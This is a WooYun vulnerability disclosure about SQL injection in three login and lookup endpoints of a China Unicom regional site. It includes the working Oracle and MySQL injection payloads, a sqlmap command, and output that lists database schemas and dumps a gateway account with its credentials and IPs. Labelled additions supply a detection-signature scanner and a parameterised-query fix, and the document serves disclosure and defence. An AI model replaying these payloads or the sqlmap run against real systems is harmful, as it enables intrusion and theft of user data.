Vulnerability summary

Defect ID: wooyun-2015-0104035

Title: Multiple SQL injections at a regional China Unicom site leak a large amount of data

Vendor: China Unicom

Author: Taro

Submitted: 2015-03-27 12:49

Fixed: 2015-05-16 08:08

Published: 2015-05-16 08:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-27: details sent to the vendor, awaiting the vendor's response
2015-04-01: vendor confirmed; details visible to the vendor only
2015-04-11: details disclosed to core white hats and experts in the relevant field
2015-04-21: details disclosed to regular white hats
2015-05-01: details disclosed to intern white hats
2015-05-16: details disclosed to the public

Brief description:

As in the title.

Detailed description:

Guangdong Unicom mobile message board
First injection point, via POST:
http://www.186online.com/usermanager/login.do
autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22



sqlmap -u "http://www.186online.com/usermanager/login.do" --data="autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1" -p "userName"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 3000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(114)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3000=3000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(109)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'GWgd'='GWgd
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 7996=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UjGl'='UjGl
---
[00:40:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[00:40:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:40:54] [INFO] fetching database (schema) names
[00:40:55] [INFO] the SQL query used returns 27 entries
[00:40:56] [INFO] retrieved: BILLSEND
[00:40:57] [INFO] retrieved: COMMON
[00:40:58] [INFO] retrieved: CTXSYS
[00:40:59] [INFO] retrieved: DBSNMP
[00:41:00] [INFO] retrieved: DMSYS
[00:41:01] [INFO] retrieved: DOCTOR_HENAN
[00:41:02] [INFO] retrieved: EMAIL
[00:41:04] [INFO] retrieved: EXFSYS
[00:41:06] [INFO] retrieved: FENGJY
[00:41:07] [INFO] retrieved: GROWSMS
[00:41:09] [INFO] retrieved: ITMUSER1
[00:41:11] [INFO] retrieved: MDSYS
[00:41:11] [INFO] retrieved: MICROBLOG
[00:41:12] [INFO] retrieved: OLAPSYS
[00:41:13] [INFO] retrieved: ORDSYS
[00:41:15] [INFO] retrieved: OUTLN
[00:41:15] [INFO] retrieved: SIGN
[00:41:16] [INFO] retrieved: SMSUSER
[00:41:18] [INFO] retrieved: SYS
[00:41:19] [INFO] retrieved: SYSMAN
[00:41:20] [INFO] retrieved: SYSTEM
[00:41:21] [INFO] retrieved: TIVOLI
[00:41:21] [INFO] retrieved: UNICOM_ALL
[00:41:23] [INFO] retrieved: WKSYS
[00:41:23] [INFO] retrieved: WK_TEST
[00:41:24] [INFO] retrieved: WMSYS
[00:41:24] [INFO] retrieved: XDB
Database: SMSUSER
Table: SMS_GATEWAY_USER
[2 entries]
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| GW_ID | IS_GW_ID | BABILITY | ADD_TIME | CLIENT_IP | PASS_WORD | IS_ACTIVE | USER_NAME | IS_BABILITY | IS_CLIENT_IP |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| hn_tele_combox_b2b_1001 | close | gwmo-gwmt-appmt-appmo | 11-1\xd4\xc2 -10 | 112.94.162.157-211.147.251.59-58.248.253.73-220.196.52.101-211.96.27.169-192.168.10.171-58.248.253.88-192.168.10.88-127.0.0.1 | testpwd | active | testuser | open | open |
| hn_tele_combox_b2b_1001 | close | gwmo-gwmt | 10-12\xd4\xc2-09 | 112.94.162.157 | testpwd | active | testusr | close | close |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+




Second injection point:
http://www.186online.com//usermanager/gd165login.do?autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22
The userName parameter is injectable.
Third injection point:
http://www.186online.com/phonebook/login.code?height=20&length=if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/&width=70
Both the length= and width= parameters are injectable.
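The three findings above share a small set of payload shapes: the 1'" probe, a quote followed by a boolean (1' AND ...), Oracle error-based extraction via XMLType, the Oracle heavy-query delay built from ALL_USERS self-joins, and MySQL's sleep(). The following Python is an added example, not part of the original report, that turns those shapes into signatures a defender can run over captured request parameters (for instance from a reverse-proxy or application log that records query strings and form bodies). The sample records, the record format (path, raw query) and the function names are constructed for the example; the paths are the endpoints the report names and the values are shortened versions of its payloads.

```python
import re
from urllib.parse import parse_qsl

# Signatures derived from the payload shapes in the report. They are matched
# case-insensitively against URL-decoded parameter values, so percent-encoding
# (e.g. %22 for a double quote) does not hide them.
SIGNATURES = {
    "quote_probe":        re.compile(r"'\""),                      # the 1'" probe
    "quote_boolean":      re.compile(r"'\s*(?:and|or)\b", re.I),   # 1' AND 3000=(...)
    "oracle_xmltype":     re.compile(r"\bxmltype\s*\(", re.I),      # Oracle error-based
    "oracle_heavy_query": re.compile(r"\bfrom\s+all_users\b", re.I),  # Oracle time-based
    "mysql_sleep":        re.compile(r"\bsleep\s*\(", re.I),        # MySQL time-based
    "inline_comment":     re.compile(r"/\*"),                      # /* ... */ trickery
}


def scan_query(raw_query):
    """Decode a query string or form body and return (param, rule) for each match."""
    hits = []
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        for rule, regex in SIGNATURES.items():
            if regex.search(value):
                hits.append((name, rule))
    return hits


def scan_records(records):
    """records: iterable of (path, raw_query) pairs as a proxy or application
    log might capture them (constructed format). Returns a list of
    (path, param, rule) findings in input order."""
    findings = []
    for path, raw_query in records:
        for name, rule in scan_query(raw_query):
            findings.append((path, name, rule))
    return findings


# Constructed sample records; not taken from a real log.
SAMPLE_RECORDS = [
    ("/usermanager/login.do",
     "autologin=true&passWord=g00dPa%24%24w0rD&userName=1'%22"),
    ("/usermanager/login.do",
     "autologin=true&passWord=g00dPa%24%24w0rD&userName=1' AND 3000="
     "(SELECT UPPER(XMLType(CHR(60))) FROM DUAL) AND 'a'='a"),
    ("/usermanager/gd165login.do",
     "userName=1' AND 7996=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2) AND 'a'='a"),
    ("/phonebook/login.code",
     "height=20&length=if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'%22*/&width=70"),
    ("/usermanager/login.do",                       # benign login, should not fire
     "autologin=true&passWord=g00dPa%24%24w0rD&userName=alice"),
]

if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print(finding)
```

The rules are deliberately narrow (a bare single quote is not flagged, since names like O'Brien are legitimate), so a hit on a login or lookup endpoint is a strong signal worth an alert; widen them with care, and always decode before matching.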

Proof of vulnerability:

http://www.186online.com//usermanager/gd165login.do?autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22

Fix recommendation:

Parameter filtering.
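"Parameter filtering" on its own is fragile; the durable fix for the login findings is to stop building SQL from the userName value at all and bind it as a parameter, and for the numeric length=/width= parameters of the third finding to accept only an integer in a sensible range. The Python below is an added example, not code from the report or from the affected application: it uses an in-memory SQLite table as a stand-in for the Oracle and MySQL back ends, so it runs anywhere, and shows the concatenated query the report's findings imply beside its parameterised form. The table, the sample users and the function names are constructed for the example.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the application's user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, pass_word TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("testuser", "testpwd")])
    return conn


def login_vulnerable(conn, user_name, pass_word):
    """The pattern behind the report's findings: the parameter is pasted into the
    SQL text, so a quote in userName changes the statement instead of being data."""
    sql = ("SELECT COUNT(*) FROM users WHERE user_name = '%s' AND pass_word = '%s'"
           % (user_name, pass_word))
    return conn.execute(sql).fetchone()[0] == 1


def login_parameterized(conn, user_name, pass_word):
    """Bound parameters: the value travels separately from the statement, so quotes
    and SQL keywords in the input are compared as literal text, never parsed."""
    sql = "SELECT COUNT(*) FROM users WHERE user_name = ? AND pass_word = ?"
    return conn.execute(sql, (user_name, pass_word)).fetchone()[0] == 1


def vulnerable_path_errors(conn, user_name, pass_word="x"):
    """True if the concatenated query fails to parse. This is the database error
    the 1'" probe in the report provokes, and what error-based extraction relies on."""
    try:
        login_vulnerable(conn, user_name, pass_word)
        return False
    except sqlite3.Error:
        return True


_INT_RE = re.compile(r"[0-9]{1,6}")


def parse_int_param(value, lo, hi):
    """Allow-list check for numeric parameters such as length= and width=: only a
    plain decimal integer within [lo, hi] is accepted; anything else is rejected
    before it can reach a query."""
    if not isinstance(value, str) or not _INT_RE.fullmatch(value):
        raise ValueError("not a plain integer: %r" % (value,))
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError("out of range: %d" % n)
    return n


if __name__ == "__main__":
    db = make_db()
    probe = "1'\""
    print("vulnerable path errors on probe:", vulnerable_path_errors(db, probe))
    print("parameterised path on probe:", login_parameterized(db, probe, "x"))
    injected = "testuser' AND 1=1 AND 'a'='a"   # same quote-and-boolean shape as the report
    print("vulnerable path evaluates injected SQL:", login_vulnerable(db, injected, "testpwd"))
    print("parameterised path treats it as a name:", login_parameterized(db, injected, "testpwd"))
    print("length=20 ->", parse_int_param("20", 1, 500))
```

With the parameterised query the same probe simply fails to match a user, the injected boolean is looked up as a (non-existent) user name, and no database error reaches the client. Oracle via JDBC (PreparedStatement) and MySQL drivers offer the same binding mechanism; the sleep()-based finding disappears once length= and width= are parsed as integers before use.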

Copyright notice: please credit the source when reposting. Taro@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-04-01 08:07

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to China Unicom Group, which will coordinate handling with the unit that operates the website.

Latest status:

None yet